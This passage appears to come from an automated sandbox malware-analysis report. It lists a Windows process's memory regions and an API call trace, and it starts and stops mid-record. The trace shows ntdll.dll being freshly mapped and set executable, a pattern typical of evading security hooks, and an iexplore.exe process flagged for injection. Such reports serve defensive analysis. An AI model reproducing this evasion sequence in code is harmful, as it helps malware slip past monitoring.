start_va = 0x74190000 end_va = 0x741a6fff monitored = 0 entry_point = 0x74193573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2397 start_va = 0x741b0000 end_va = 0x741b4fff monitored = 0 entry_point = 0x741b10f6 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 2398 start_va = 0x741c0000 end_va = 0x741ecfff monitored = 0 entry_point = 0x741c2477 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\SysWOW64\\ieui.dll" (normalized: "c:\\windows\\syswow64\\ieui.dll") Region: id = 2399 start_va = 0x741f0000 end_va = 0x741fffff monitored = 0 entry_point = 0x741f38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 2400 start_va = 0x74200000 end_va = 0x74205fff monitored = 0 entry_point = 0x7420125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 2401 start_va = 0x74210000 end_va = 0x7421cfff monitored = 0 entry_point = 0x74211326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 2402 start_va = 0x74220000 end_va = 0x74234fff monitored = 0 entry_point = 0x742212de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 2403 start_va = 0x74240000 end_va = 0x74291fff monitored = 0 entry_point = 0x742414be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 2404 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2405 start_va = 0x742c0000 end_va = 0x742cdfff monitored = 0 entry_point = 0x742c1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2406 start_va = 0x742d0000 end_va = 0x74307fff monitored = 0 entry_point = 0x742d990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2407 start_va = 0x74310000 end_va = 0x74315fff monitored = 0 entry_point = 0x743114b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2408 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2409 start_va = 0x743a0000 end_va = 0x743a5fff monitored = 0 entry_point = 0x743a1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 2410 start_va = 0x743b0000 end_va = 0x743b4fff monitored = 0 entry_point = 0x743b15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 2411 start_va = 0x743c0000 end_va = 0x743fbfff monitored = 0 entry_point = 0x743c145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2412 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2413 start_va = 0x74410000 end_va = 0x74416fff monitored = 0 entry_point = 0x7441128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2414 start_va = 0x74420000 end_va = 0x7443bfff monitored = 0 entry_point = 0x7442a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2415 start_va = 0x74440000 end_va = 0x74483fff monitored = 0 entry_point = 0x744563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2416 start_va = 0x74490000 end_va = 0x744b0fff monitored = 0 entry_point = 0x7449145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2417 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2418 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2419 start_va = 0x74670000 end_va = 0x746abfff monitored = 0 entry_point = 0x74673089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 2420 start_va = 0x746b0000 end_va = 0x7512ffff monitored = 0 entry_point = 0x746b6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 2421 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2422 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2423 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2424 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2425 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2426 start_va = 0x75470000 end_va = 0x755a5fff monitored = 0 entry_point = 0x75471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2427 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2428 start_va = 0x76200000 end_va = 0x76234fff monitored = 0 entry_point = 0x7620145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2429 start_va = 0x76240000 end_va = 0x76266fff monitored = 0 entry_point = 0x762458b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2430 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2431 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2432 start_va = 0x763d0000 end_va = 0x7652bfff monitored = 0 entry_point = 0x7641ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2433 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2434 start_va = 0x765c0000 end_va = 0x766b4fff monitored = 0 entry_point = 0x765c1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2435 start_va = 0x766c0000 end_va = 0x766cbfff monitored = 0 entry_point = 0x766c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2436 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2437 start_va = 0x767d0000 end_va = 0x7684afff monitored = 0 entry_point = 0x767d1aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 2438 start_va = 0x76850000 end_va = 0x768a6fff monitored = 0 entry_point = 0x76869ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2439 start_va = 0x768b0000 end_va = 0x769d0fff monitored = 0 entry_point = 0x768b158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2440 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2441 start_va = 0x76ad0000 end_va = 0x76b5efff monitored = 0 entry_point = 0x76ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2442 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2443 start_va = 0x76ca0000 end_va = 0x76ca4fff monitored = 0 entry_point = 0x76ca1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2444 start_va = 0x76cb0000 end_va = 0x76e4cfff monitored = 0 entry_point = 0x76cb17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2445 start_va = 0x76e50000 end_va = 0x7704afff monitored = 0 entry_point = 0x76e522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2446 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2447 start_va = 0x77130000 end_va = 0x77174fff monitored = 0 entry_point = 0x771311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2448 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2449 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2450 start_va = 0x773c0000 end_va = 0x773d1fff monitored = 0 entry_point = 0x773c1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2451 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2452 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2453 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2454 start_va = 0x774b0000 end_va = 0x774b5fff monitored = 0 entry_point = 0x774b1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2455 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2456 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2457 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2458 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2459 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2460 start_va = 0x7ef8c000 end_va = 0x7ef8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 2461 start_va = 0x7ef95000 end_va = 0x7ef97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 2462 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 2463 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2464 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2465 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2466 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2467 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2468 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2469 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2470 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2471 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2472 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2473 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2474 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2475 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2476 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2478 start_va = 0x27f0000 end_va = 0x28d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 4745 start_va = 0x36e0000 end_va = 0x371ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 4746 start_va = 0x6420000 end_va = 0x651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006420000" filename = "" Region: id = 4747 start_va = 0x6520000 end_va = 0x669ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4748 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 4749 start_va = 0x750000 end_va = 0x753fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Thread: id = 144 os_tid = 0xc08 Thread: id = 145 os_tid = 0x810 Thread: id = 146 os_tid = 0x80c Thread: id = 147 os_tid = 0x804 Thread: id = 148 os_tid = 0x204 Thread: id = 149 os_tid = 0x6bc Thread: id = 150 os_tid = 0x740 Thread: id = 151 os_tid = 0x6a0 Thread: id = 152 os_tid = 0x7b8 Thread: id = 153 os_tid = 0x3a4 [0268.489] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x52e5bc | out: HeapArray=0x52e5bc*=0x7b0000) returned 0xb [0268.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x52e2c8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0268.562] NtCreateFile (in: FileHandle=0x52e2e8, DesiredAccess=0x1200a0, ObjectAttributes=0x52e2b0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x52e2d0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x52e2e8*=0x558, IoStatusBlock=0x52e2d0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0268.571] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7f85a0) returned 1 [0268.573] NtCreateSection (in: SectionHandle=0x52e250, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x558 | out: SectionHandle=0x52e250*=0x460) returned 0x0 [0268.577] NtMapViewOfSection (in: SectionHandle=0x460, ProcessHandle=0xffffffff, BaseAddress=0x52e24c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x52e248*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x52e24c*=0x6520000, SectionOffset=0x0, ViewSize=0x52e248*=0x180000) returned 0x40000003 [0268.579] NtClose (Handle=0x558) returned 0x0 [0268.580] NtClose (Handle=0x460) returned 0x0 [0268.583] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x52e300*=0x6520000, NumberOfBytesToProtect=0x52e310, NewAccessProtection=0x40, OldAccessProtection=0x52e2fc | out: BaseAddress=0x52e300*=0x6520000, NumberOfBytesToProtect=0x52e310, OldAccessProtection=0x52e2fc*=0x2) returned 0x0 [0268.584] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x52e2f4*=0x6530000, NumberOfBytesToProtect=0x52e2f8, NewAccessProtection=0x40, OldAccessProtection=0x52e2fc | out: BaseAddress=0x52e2f4*=0x6530000, NumberOfBytesToProtect=0x52e2f8, OldAccessProtection=0x52e2fc*=0x20) returned 0x0 [0268.587] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x52e2f4*=0x6610000, NumberOfBytesToProtect=0x52e2f8, NewAccessProtection=0x40, OldAccessProtection=0x52e2fc | out: BaseAddress=0x52e2f4*=0x6610000, NumberOfBytesToProtect=0x52e2f8, OldAccessProtection=0x52e2fc*=0x20) returned 0x0 [0268.588] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x52e2f4*=0x6620000, NumberOfBytesToProtect=0x52e2f8, NewAccessProtection=0x40, OldAccessProtection=0x52e2fc | out: BaseAddress=0x52e2f4*=0x6620000, NumberOfBytesToProtect=0x52e2f8, OldAccessProtection=0x52e2fc*=0x8) returned 0x0 [0268.589] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x52e2f4*=0x6630000, NumberOfBytesToProtect=0x52e2f8, NewAccessProtection=0x40, OldAccessProtection=0x52e2fc | out: BaseAddress=0x52e2f4*=0x6630000, NumberOfBytesToProtect=0x52e2f8, OldAccessProtection=0x52e2fc*=0x2) returned 0x0 [0268.590] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x52e2f4*=0x6690000, NumberOfBytesToProtect=0x52e2f8, NewAccessProtection=0x40, OldAccessProtection=0x52e2fc | out: BaseAddress=0x52e2f4*=0x6690000, NumberOfBytesToProtect=0x52e2f8, OldAccessProtection=0x52e2fc*=0x2) returned 0x0 Thread: id = 199 os_tid = 0xfb8 Process: id = "11" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x549c3000" os_pid = "0x81c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x694" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" SCODEF:1684 CREDAT:14337" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2481 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2482 start_va = 0x20000 end_va = 0x21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 2483 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2484 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2485 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2486 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2487 start_va = 0x70000 end_va = 0x70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 2488 start_va = 0x80000 end_va = 0x81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2489 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 2490 start_va = 0xa0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2491 start_va = 0x120000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2492 start_va = 0x160000 end_va = 0x1c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2493 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2494 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2495 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2496 start_va = 0x200000 end_va = 0x201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2497 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2498 start_va = 0x220000 end_va = 0x221fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2499 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 2500 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2501 start_va = 0x250000 end_va = 0x251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2502 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2503 start_va = 0x270000 end_va = 0x315fff monitored = 0 entry_point = 0x271c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 2504 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 2505 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = 